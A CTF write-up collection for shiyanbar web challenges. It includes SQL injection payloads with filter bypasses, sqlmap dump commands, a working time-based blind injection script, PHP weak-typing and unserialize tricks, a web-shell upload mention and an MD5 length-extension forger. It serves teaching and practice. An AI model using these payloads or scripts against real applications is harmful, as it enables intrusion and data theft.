#简单的SQL注入 (Simple SQL injection)
http://www.shiyanbar.com/ctf/1875
1) Try id=1: no error.
2) Try id=1': an error is echoed back, so there is an injection point:
   You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' at line 1
3) First guess that the back-end table is named flag, so the statement we want to run is union select flag from flag.
4) Step 2 shows the value is wrapped in single quotes, so after our opening ' the statement needs another ' to close it. Injected statement: ?id=1' union select flag from flag where 't'='t
   Echo: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''t'='t' at line 1
   Analysis: judging from the error, the keywords themselves are not filtered.
5) Write the keywords from and where twice to test. The error becomes: ... for the right syntax to use near 'unionselectflag fromflag where 't'='t' at line 1. The spaces are gone: the space is what gets filtered!
6) Use + in place of the space: ?id=1'+union+select+flag+from+flag+wherewhere+'t'='t
#简单的SQL注入之2 (Simple SQL injection, part 2)
http://www.shiyanbar.com/ctf/1908
1. id=1, id=2 and id=3 display normally, so the table only has three rows.
2. id=1' gives a MySQL syntax error; the statement is probably select name from user where id='<input>'
3. id=1 ' with a space in the middle shows "SQLi detected!", so the space is filtered.
Putting these three observations together: whatever we append to the id parameter is spliced into the SQL and executed, so we can inject.
Keep the probing simple:
id=1'%0band%0b'1'='1
(%0b stands in for the space; MySQL also accepts %09, %0a, %0c, %0d and /**/ as separators, so those can be tried as well.)
Displays normally:
id:1' and '1'='1    name:baloteli
Continue testing. This logical trick works well:
?id=1'||'id'||'
The data in the table is displayed. The statement becomes select name from user where id='1'||'id'||''. In MySQL || is logical OR, so the extra terms are OR-ed onto the condition while the quotes stay balanced; to show all the records in the table you can append more ||' terms, as long as the statement is closed.
id:1'||'id'||'    name:baloteli
id:1'||'id'||'    name:kanawaluo
id:1'||'id'||'    name:dengdeng
Then, by analogy with the first challenge, we guess there is a flag table.
Encode the keywords (hex-encoded letters inside comments) to get it done:
?id=1'/*!u%6eion*//*!se%6cect*/flag/*!from*/flag/*!where*/'='
/*! ... */ are MySQL conditional comments, so their contents still execute while the comment delimiters take the place of the filtered spaces; %6e and %6c are URL-encoded n and l, so the literal keywords union and select never appear in the request.
Flag obtained directly.
#简单的SQL注入之3 (Simple SQL injection, part 3)
http://www.shiyanbar.com/ctf/1909
For this one I only used sqlmap:
1) Enumerate the databases: sqlmap -u "http://ctf5.shiyanbar.com/web/index_3.php?id=1" --dbs
   It ran all the way through and listed the databases.
2) Confirm the current database: sqlmap -u "http://ctf5.shiyanbar.com/web/index_3.php?id=1" --current-db
3) Get the table names: sqlmap -u "http://ctf5.shiyanbar.com/web/index_3.php?id=1" --tables
4) Get the columns of the flag table: sqlmap -u "http://ctf5.shiyanbar.com/web/index_3.php?id=1" --columns -T flag
5) Dump it: sqlmap -u "http://ctf5.shiyanbar.com/web/index_3.php?id=1" --dump -C flag -T flag
Tip: if sqlmap gets through quickly, by all means use it, but mastering manual injection is the real way.
#天下武功唯快不破 (Speed is everything)
http://www.shiyanbar.com/ctf/1854
First look at the source code.
Submit the key that was found there via POST and look at the response headers.
A FLAG header is found there; the key that has to be POSTed is derived from it, but it must be sent back fast, so only a script will do. Script (Python 3):

import base64
import requests

url = 'http://ctf5.shiyanbar.com/web/10/10.php'
# the FLAG response header is base64; the decoded text has the form "<label>:<key>"
rs = requests.get(url).headers['FLAG']
v = base64.b64decode(rs).decode()
# the key is only valid for a moment, so POST it straight back in the same run
print(requests.post(url=url, data={'key': v.split(':')[1]}).text)

Tip: requests can be installed with pip if it is missing (base64 is part of the standard library); if pip itself is unavailable, refer to my previous blog post.
#拐弯抹角 (Roundabout)
http://www.shiyanbar.com/ctf/1846
Following the hint on the page, append index.php to the URL to get the flag.
#Forms
http://www.shiyanbar.com/ctf/1819
F12 and view the source first.
Find the hidden showsource field with value 0 and change it to 1; the hidden source code appears, containing
if ($a == -19827747736161128312837161661727773716166727272616149001823847)
Set the PIN to that number and submit.
#天网管理系统 (Skynet management system)
http://www.shiyanbar.com/ctf/1810
First right-click to view the source (manually, funny).
It asks for a user name whose MD5 == 0, which is a test of PHP weak typing: with == a hash string of the form 0e followed only by digits is treated as a number in scientific notation and equals 0. Here I provide 4 values that can pass;
or search Baidu for md5 hashes starting with 0e: http://www.mamicode.com/info-detail-1719711.html
Enter one of them as the user name, and the page reveals the next step:
then you know;
open the link it gives:
$unserialize_str = $_POST['password'];
$data_unserialize = unserialize($unserialize_str);
if ($data_unserialize['user'] == '???' && $data_unserialize['pass'] == '???') {
    print_r($flag);
}
The great scientist PHP says: won by bool, lost by bool. Go home, young man.
The code is not hard to follow: the POSTed password value is unserialized into an array, and if both user and pass of that array satisfy the condition the flag is printed. We don't know what '???' is, but we can notice that the judgment uses ==, PHP weak typing again:
<?php if (true == "Pcat") { echo "OK"; } ?>
A bool true loosely equals any non-empty string other than "0" (here "Pcat"), so whenever unserialize or json_decode appears in the code we can construct bool values to fool the comparison. So we build an array with two elements, user and pass, both the bool true:
a:2:{s:4:"user";b:1;s:4:"pass";b:1;}
(a means array, s string, b bool; the numbers are the element count, the string length and the bool value.)
Finally, submit it via POST in the password field.
#Once more
http://www.shiyanbar.com/ctf/1805
A simple code-audit problem. Per the if statements, password must be greater than 9999999 and must also contain *-*.
OK, just construct the password: password=1e8%00*-*
(Note: simply appending *-* to the number would be meaningless; use %00 to truncate first, then add *-*.)
Look back and the flag is there. Over!
#Guess Next Session
http://www.shiyanbar.com/ctf/1788
This challenge needs Firefox plus the Cookie Manager+ add-on.
As usual, look at the source first:
it shows that the value received via GET must equal the value stored in the session.
Use Cookie Manager+ to delete the PHPSESSID cookie; with no session there is nothing stored on the server side, so the value to match is empty.
Then just guess: submit an empty value and it matches.
#FALSE
http://www.shiyanbar.com/ctf/1787
<title>level1</title>
<link rel='stylesheet' href='style.css' type='text/css'>
<body>
<?php
require 'flag.php';
if (isset($_GET['name']) and isset($_GET['password'])) {
    if ($_GET['name'] == $_GET['password'])
        print 'Your password can not be your name.';
    else if (sha1($_GET['name']) === sha1($_GET['password']))
        die('Flag: ' . $flag);
    else
        print '<p class="alert">Invalid password.</p>';
}
?>
<section class="login">
  <div class="title">
    <a href="./index.txt">level 1</a>
  </div>
  <form method="get">
    <input type="text" required name="name" placeholder="name"/><br/>
    <input type="text" required name="password" placeholder="password"/><br/>
    <input type="submit"/>
  </form>
</section>
</body>
Reading the code: two GET fields, name and password, and the flag requires name != password while sha1(name) === sha1(password). At first glance impossible, but sha1() can be made to fail: pass both fields as arrays, ?name[]=a&password[]=b. At the first comparison the two arrays are indeed different, but sha1() cannot handle an array, so at the second comparison it emits a warning and returns NULL for both sides; NULL === NULL holds, the if condition is satisfied and the flag is printed.
#上传绕过 (Upload bypass)
http://www.shiyanbar.com/ctf/1781
Upload a one-line PHP trojan (一句话木马) and connect to it with China Chopper (中国菜刀). Done.
#what a fuck! What the hell is this?
http://www.shiyanbar.com/ctf/56
Very distinctive: this is JOther encoding, a pile of brackets. It can be decoded online, but in an offline exam open Chrome, press F12 to get the console, paste the whole code, press Enter and the key pops up.
#这个看起来有点简单 (This looks a bit simple)
http://www.shiyanbar.com/ctf/33
SQL injection with a union query.
Union query, two columns:
http://ctf5.shiyanbar.com/8/index.php?id=1%20union%20select%201,1
List the databases:
http://ctf5.shiyanbar.com/8/index.php?id=1%20union%20select%201,SCHEMA_NAME%20from%20information_schema.SCHEMATA
List the table names:
http://ctf5.shiyanbar.com/8/index.php?id=1%20union%20select%201,TABLE_NAME%20from%20information_schema.TABLES
List the columns:
http://ctf5.shiyanbar.com/8/index.php?id=1%20union%20select%201,COLUMN_NAME%20from%20information_schema.COLUMNS
k0y in the table thiskey is the most suspicious, so query it:
http://ctf5.shiyanbar.com/8/index.php?id=1%20union%20select%201,k0y%20from%20thiskey
#头有点大 (The header is a bit big)
http://www.shiyanbar.com/ctf/29
Firefox or Chrome, F12.
Click Edit and Resend, edit the request: change the language and add .NET Framework 9.9 to the User-Agent, i.e. append .NET CLR 9.9; (with the semicolon).
Send and look at the preview.
#Forbidden
http://www.shiyanbar.com/ctf/21
F12, select Network, reload, then click Edit and Resend.
Change zh-CN to zh-HK in the Accept-Language header.
After sending, the flag can be seen on the preview page.
#猫捉老鼠 (Cat catches mouse)
http://www.shiyanbar.com/ctf/20
The title says "catch", so capture the request with Burp Suite and send the captured request to Repeater.
Click Go directly and look at the response: the hint is in one of the response header lines, where the following value appears.
Copy "MTQ4ODg2ODA4MA==" (the header value is base64) and use it to replace the 123 that was submitted in Repeater; the response now contains the key.
#登录一下好吗? (Would you log in?)
http://www.shiyanbar.com/ctf/1942
Explanation:
Evaluate username='tg' first: the database generally won't contain my nickname (if it does, change the string), so this returns 0 (equivalent to false).
Then 0='' is evaluated. What is the result? You can probably see it already: it returns 1 (equivalent to true), because the empty string converts to the number 0.
So the injected query is equivalent to
select * from user where 1 and 1
which is the same as select * from user
(this challenge only checks the result: once the query returns rows it shows the flag instead of "sorry, no this user!!").
OK, to keep nagging: the comparison above is a weak-typed comparison, and the following conditions are all true in MySQL:
1='1'
1='1.0'
1='1x' (a letter after the leading digit, or even further digits after that letter, is ignored once the leading number has been parsed)
0='any string that does not start with a non-zero digit'
(Overall, as long as the 0 comes first, making the statement true is very easy, so there are many ways to write the universal password for this question in the style above.)
#who is that you? (who are you?)
http://www.shiyanbar.com/ctf/1941
Time-based blind injection through the X-Forwarded-For header. If you don't know the technique, search Baidu; I'll go straight to the script (Python 3):

import requests
import sys
import time

url = 'http://ctf5.shiyanbar.com/web/wonderkun/index.php'
DELAY = 0.5   # sleep() is the oracle: a response slower than this means "bit set"


def injected_bit(expr, index, bit):
    """Send one request whose X-Forwarded-For value tests bit `bit` of the
    `index`-th character of the SQL expression `expr`; True if the server slept."""
    sql = ("222' and (case when (ascii(substring((%s) from %d for 1)) & %d != 0) "
           "then sleep(%s) else sleep(0) end) and '1'='1" % (expr, index, bit, DELAY))
    start = time.time()
    requests.get(url, headers={'x-forwarded-for': sql})
    return time.time() - start > DELAY


def extract(expr):
    """Recover the string value of `expr` one byte at a time, 8 requests per byte,
    stopping at the first NUL (ascii('') is 0 once we run past the end)."""
    result = ''
    index = 1
    while True:
        value = 0
        for i in range(8):
            if injected_bit(expr, index, 1 << i):
                value += 1 << i
        if value == 0:
            return result
        sys.stdout.write(chr(value))
        sys.stdout.flush()
        result += chr(value)
        index += 1


def retrieve_current_database():
    return extract('select database()')


def retrieve_tables(database):
    """Table names in `database`, one row at a time, until an empty name comes back."""
    row = 0
    tables = []
    while True:
        name = extract("select table_name from information_schema.tables "
                       "where table_schema='%s' limit 1 offset %d" % (database, row))
        if not name:
            return tables
        print('')
        tables.append(name)
        row += 1


def dump_column():
    """Dump the flag column of the flag table row by row."""
    row = 0
    while True:
        value = extract('select flag from flag limit 1 offset %d' % row)
        if not value:
            return
        row += 1


def main():
    database = retrieve_current_database()
    print('\ncurrent database is %s' % database)
    print("let's see the table names in the database!")
    retrieve_tables(database)
    print("let's dump the flag!")
    sys.stdout.write('ctf{')
    dump_column()
    sys.stdout.write('}\n')


if __name__ == '__main__':
    main()
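The following is an added example, not code from the original writeup: the same bit-by-bit extraction loop the script above uses, run offline against a constructed boolean oracle backed by an in-memory SQLite table, so that its correctness and its cost (8 oracle queries per recovered byte, plus 8 for the terminator) can be checked without a target. SQLite's unicode()/substr() stand in for MySQL's ascii()/substring(), a true/false answer stands in for the sleep() timing, and the flag value, table and column names are constructed sample data.

```python
import sqlite3

# Constructed stand-in for the target database. The real challenge ran MySQL and leaked
# bits through sleep() timing; here the oracle answers true/false directly, which is
# enough to exercise the same bit-by-bit extraction loop.
SAMPLE_FLAG = 'ctf{constructed_sample_flag}'   # constructed sample data, not the real flag
_conn = sqlite3.connect(':memory:')
_conn.execute('CREATE TABLE flag (flag TEXT)')
_conn.execute('INSERT INTO flag VALUES (?)', (SAMPLE_FLAG,))

QUERY_LOG = []   # every condition sent to the oracle, to count the cost of the attack


def oracle(condition):
    """Boolean oracle: True when the injected condition holds.
    Stands in for 'the response took longer than sleep(0.5)' in the timing version."""
    QUERY_LOG.append(condition)
    return _conn.execute('SELECT 1 WHERE ' + condition).fetchone() is not None


def extract_string(subquery, max_len=128):
    """Recover the text value of `subquery` one byte at a time, one oracle query per
    bit (8 per character), exactly like the script's ascii(substring(...)) & 2^i test.
    SQLite spells these unicode()/substr(); unicode('') is NULL, so running past the end
    yields all-zero bits, which terminates the loop just as ascii('') == 0 does in MySQL."""
    result = ''
    for index in range(1, max_len + 1):
        value = 0
        for bit in range(8):
            cond = '(unicode(substr((%s), %d, 1)) & %d) != 0' % (subquery, index, 1 << bit)
            if oracle(cond):
                value |= 1 << bit
        if value == 0:
            break
        result += chr(value)
    return result


def extract_with_cost(subquery):
    """Return (recovered value, number of oracle queries it took)."""
    before = len(QUERY_LOG)
    value = extract_string(subquery)
    return value, len(QUERY_LOG) - before


if __name__ == '__main__':
    flag, cost = extract_with_cost('SELECT flag FROM flag')
    print('%s recovered with %d oracle queries (8 per byte, plus 8 for the terminator)' % (flag, cost))
```

The query count is the point to take away: with a time-based oracle each of those queries costs at least one sleep() period, so a 30-byte value takes around 250 requests and, at sleep(0.5), over two minutes; that is why the original script prints each character as soon as its 8 bits are in rather than waiting for the whole string.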
#因缺思厅的绕过 (An "interesting" bypass)
http://www.shiyanbar.com/ctf/1940
View the source to find this, then change the URL accordingly.
Out comes this.
This is the check on the POST data. It is not filtering in the narrow sense, just a check: if a sensitive character is found it prints "water can carry a boat, and can also be rowing!" and ends.
It mainly checks for and, select, from, where, union, join, sleep, benchmark, the comma and the parentheses, the things commonly used in SQL injection.
Nothing to say about the database connection part. Next, $_POST['uname'] goes straight into the SQL query against the interest table. It verifies that the query returns exactly one row, and if the pwd column of that row compares equal to $_POST['pwd'], the flag is output.
The program looks quite simple and the logic is clear. To get the flag two conditions have to pass: mysql_num_rows($query) == 1 and $key['pwd'] == $_POST['pwd'].
I believe some people reach for sqlmap without even reading the code. Having read the code, I don't recommend that; you gain very little. Look at the input check and you'll understand.
Imagine controlling the query result with UNION SELECT: then $key['pwd'] and $_POST['pwd'] are both in our hands, but the crux of this route is getting past the input check. I tried many methods by hand against the input check, all in vain. Looking at the code again, I realised this kind of check seems impossible to get around.
So I adjusted the strategy. Two conditions have to be satisfied. The first is actually easy to satisfy: x' or 1 limit passes the first check. Then look at the second, $key['pwd'] == $_POST['pwd']. Since we can't get the data out of the database (at least I can't), the only option is to control $key['pwd'] in this condition. I groped around for a long time and almost gave up, then asked Pcat whether there was anything to be done here. The answer was yes, with a few hints. Finally the target became: make $key['pwd'] NULL. But the input check is very strict; commas, parentheses and so on are all gone. To reach the goal I went through the MySQL manual. The process was long, and not for lack of thought. The contents of the manual were still in my head at breakfast, and after breakfast I thought of the place to use them: GROUP BY ... WITH ROLLUP.
x' or 1 group by pwd with rollup #
ROLLUP appends a summary row in which the grouped column pwd is NULL. Finally, select that row with an offset; payload: x' or 1 group by pwd with rollup limit 1 offset
With $key['pwd'] NULL, PHP's loose comparison NULL == '' is true, so the pwd field is left empty.
#让我进去 (Let me in)
http://www.shiyanbar.com/ctf/1848
A hash length extension attack. For the principle, search Baidu; I won't go on about it here.
Recommended reading first: http://www.cnblogs.com/pcat/p/5478509.html
That post introduces the method in detail, so I won't repeat it.
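The writeup leaves the mechanics to the linked post. What follows is an added example, not code from the original writeup or from that post: a self-contained MD5 length extension in Python. The server secret, the known message and the appended data are constructed values; the challenge's own cookie or parameter format is not on this page, so nothing here refers to it. The trick it demonstrates is that an MD5 digest is nothing but the hash's internal state after the last padded block, so anyone who knows md5(secret || msg) and only the length of secret can pad exactly as MD5 would, resume the compression function from the published state, and produce a valid digest for secret || msg || glue || append.

```python
import hashlib
import math
import struct

# MD5 internals written out so the compression function can be started from an
# arbitrary chaining value: that is the whole trick behind length extension.
MD5_IV = [0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476]
_S = [7, 12, 17, 22] * 4 + [5, 9, 14, 20] * 4 + [4, 11, 16, 23] * 4 + [6, 10, 15, 21] * 4
_K = [int(abs(math.sin(i + 1)) * 2 ** 32) & 0xFFFFFFFF for i in range(64)]
_MASK = 0xFFFFFFFF


def _rotl(x, c):
    return ((x << c) | (x >> (32 - c))) & _MASK


def md5_padding(total_len):
    """Padding MD5 appends to a message of total_len bytes: 0x80, zeros up to
    56 mod 64, then the bit length as a 64-bit little-endian integer."""
    zeros = b'\x00' * ((55 - total_len) % 64)
    return b'\x80' + zeros + struct.pack('<Q', (total_len * 8) & 0xFFFFFFFFFFFFFFFF)


def md5_compress(state, block):
    """One 64-byte block through the four MD5 rounds; returns the new chaining value."""
    a, b, c, d = state
    m = struct.unpack('<16I', block)
    for i in range(64):
        if i < 16:
            f, g = (b & c) | (~b & d), i
        elif i < 32:
            f, g = (d & b) | (~d & c), (5 * i + 1) % 16
        elif i < 48:
            f, g = b ^ c ^ d, (3 * i + 5) % 16
        else:
            f, g = c ^ (b | ~d), (7 * i) % 16
        f = (f + a + _K[i] + m[g]) & _MASK
        a, d, c, b = d, c, b, (b + _rotl(f, _S[i])) & _MASK
    return [(x + y) & _MASK for x, y in zip(state, (a, b, c, d))]


def md5_resume(state, data, already_hashed):
    """Finish an MD5 computation: `state` is the chaining value after `already_hashed`
    bytes (a multiple of 64) and `data` is what still has to be absorbed."""
    msg = data + md5_padding(already_hashed + len(data))
    for off in range(0, len(msg), 64):
        state = md5_compress(state, msg[off:off + 64])
    return struct.pack('<4I', *state).hex()


def md5_hex(data):
    """Plain MD5 from the standard IV, as a check that the implementation is right."""
    return md5_resume(list(MD5_IV), data, 0)


def naive_mac(secret, message):
    """What the vulnerable server computes and publishes: md5(secret || message)."""
    return hashlib.md5(secret + message).hexdigest()


def server_side_check(secret, message, mac_hex):
    """The server's verification: recompute the naive MAC and compare."""
    return naive_mac(secret, message) == mac_hex


def length_extend(known_hash_hex, known_suffix, secret_len, append):
    """Given h = md5(secret || known_suffix) and only len(secret), forge
    md5(secret || known_suffix || glue || append) without knowing secret.
    Returns (forged message without the secret, forged hex digest)."""
    glue = md5_padding(secret_len + len(known_suffix))
    # The published digest IS the chaining value after the padded original message.
    state = list(struct.unpack('<4I', bytes.fromhex(known_hash_hex)))
    forged_hash = md5_resume(state, append, secret_len + len(known_suffix) + len(glue))
    return known_suffix + glue + append, forged_hash


if __name__ == '__main__':
    secret = b'constructed-server-secret'   # constructed; attacker knows only its length
    data = b'user=guest'                    # constructed known message
    published = naive_mac(secret, data)
    forged, forged_hash = length_extend(published, data, len(secret), b'&role=admin')
    print(forged, forged_hash)
    print('server accepts forged message:', server_side_check(secret, forged, forged_hash))
```

The forged message necessarily contains the glue padding (a 0x80 byte, NULs and the length field), which is why such attacks surface where the server parses the message leniently, for example reading the last occurrence of a parameter; the fix on the server side is HMAC, whose nested construction does not expose the hash state.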
#忘记密码了 (Forgot the password)
http://www.shiyanbar.com/ctf/1808
First Ctrl+U to view the page source: you can see the admin's address "[email protected]" and that the editor is Vim.
Type anything and submit; a JS popup says the password is in step2.php. Opening step2.php directly just jumps back to step.php. Fine, look at it in Fiddler: sure enough, a 302 redirect. Visiting step2.php shows that it simply has the built-in address [email protected] and sends it to submit.php. Visit submit.php again and it shows "you are not admin".
That route doesn't work. Other people's writeups say Vim leaves a temporary swap file behind. Requesting .submit.php.swp in the browser: sure enough the file exists. Parts are garbled, but the code is just about readable. submit.php needs two parameters, emailAddress and token. emailAddress is just the admin address, and token is checked: it must == 0 and have length 10.
Change the URL to: http://ctf5.shiyanbar.com/10/upload/[email protected]&token=0000000000
#NSCTF web200
http://www.shiyanbar.com/ctf/1760
The challenge is a PHP "encryption" routine; we just run it backwards:

<?php
$DD = "A1zlbgqsceseiqrlwuqaymwlyq2l5vwbxqga3rqayumz0tmmvsgm2zwb4tws";
$s = str_rot13($DD);          // undo the final rot13
$a = strrev($s);              // undo the string reversal
$b = base64_decode($a);       // undo the base64 encoding
$aa = '';
for ($e = 0; $e < strlen($b); $e++) {
    $g = substr($b, $e, 1);
    $temp = ord($g) - 1;      // the encryption added 1 to every byte
    $g = chr($temp);
    $aa = $aa . $g;
}
echo strrev($aa);             // the encryption started by reversing the plaintext
?>
#程序逻辑问题 (Program logic problem)
http://www.shiyanbar.com/ctf/62
This one still had me stuck for hours.
The final payload:
user=1 union select concat('BCBE3365E6AC95EA2C0343A2395834DD')%23&pass=222
At first I thought of plain injection, and what I finally injected out was that the pw field is 111.
Then I tried weak typing and found nothing soft about it.
Finally I thought of a union query:
select username from admin where id=-1 union select concat('BCBE3365E6AC95EA2C0343A2395834DD')
Principle: since no user with id -1 exists, the row returned is the one the union adds, BCBE3365E6AC95EA2C0343A2395834DD,
which is the MD5 of 222.
Submit pass=222 at the same time and the flag shines out.
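As an added example (not the challenge's source, which this writeup does not reproduce), the logic described above, a login that splices the user name into its query and compares the returned pw column with md5(pass), is rebuilt on an in-memory SQLite table, with the union payload beside a parameterized version that the same payload no longer fools. The table, its column names and its single row are constructed assumptions; SQLite terminates a line comment with -- where the MySQL target took # (%23 in the URL).

```python
import hashlib
import sqlite3

# Constructed stand-in for the challenge's admin table. The real table is unknown beyond
# the writeup's observation that its pw field was 111; it is stored here as md5('111').
_conn = sqlite3.connect(':memory:')
_conn.execute('CREATE TABLE admin (username TEXT, pw TEXT)')
_conn.execute('INSERT INTO admin VALUES (?, ?)', ('admin', hashlib.md5(b'111').hexdigest()))


def _md5(text):
    return hashlib.md5(text.encode()).hexdigest()


def login_vulnerable(user, password):
    """The challenge's logic as the writeup describes it: the user name is spliced into
    the statement and the pw column of the returned row is compared with md5(password)."""
    sql = "SELECT pw FROM admin WHERE username='%s'" % user
    row = _conn.execute(sql).fetchone()
    return row is not None and row[0] == _md5(password)


def login_fixed(user, password):
    """Same comparison, but the user name travels as a bound parameter, so it can never
    add a UNION branch to the statement; it is only ever compared against the column."""
    row = _conn.execute('SELECT pw FROM admin WHERE username=?', (user,)).fetchone()
    return row is not None and row[0] == _md5(password)


def union_payload(password):
    """A user name that makes the real (empty) result be replaced by our own hash:
    the WHERE matches nothing, the UNION branch supplies md5(password) as the pw column,
    and the comment swallows the closing quote of the original statement."""
    return "' UNION SELECT '%s'-- " % _md5(password)


if __name__ == '__main__':
    print('vulnerable, real creds  :', login_vulnerable('admin', '111'))
    print('vulnerable, union + 222 :', login_vulnerable(union_payload('222'), '222'))
    print('fixed,      union + 222 :', login_fixed(union_payload('222'), '222'))
```

The check itself is not the bug: comparing a stored hash with md5() of the submitted password is fine. The bug is that the attacker decides which row gets compared, so the password they submit only has to match a hash they chose themselves.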
#PHP大法 (The PHP way)
http://www.shiyanbar.com/ctf/54
Reading the code in http://ctf5.shiyanbar.com/DUTCTF/index.php.txt tells you:
if id equals "hackerDJ" the flag is refused, but after urldecode() it has to be "hackerDJ".
So the value must not be "hackerDJ" after the first decoding (PHP's own decoding of the query string) but must become "hackerDJ" after the second (the explicit urldecode). Encoding twice does exactly that.
(No need to encode the whole word; one letter is enough, e.g. the final J -> %254A.)
http://ctf5.shiyanbar.com/DUTCTF/index.php?id=hackerD%254A
#貌似有点难 (Seems a bit hard)
http://www.shiyanbar.com/ctf/32
Open Burp, intercept a request, add an X-Forwarded-For header with the value 1.1.1.1 and forward it.
Then the key is shown.
#看起来有点难 (Looks a bit hard)
http://www.shiyanbar.com/ctf/2
SQL injection, very simple, but it runs slowly; surprisingly it is worth 50 points, and I don't know where the difficulty is supposed to be.
The challenge itself is fine; it only looks scary. Believe in yourself and don't be confused by what's in front of you.
For the record:
shiyanbar (实验吧) web challenges (26/26), full writeup, super detailed :)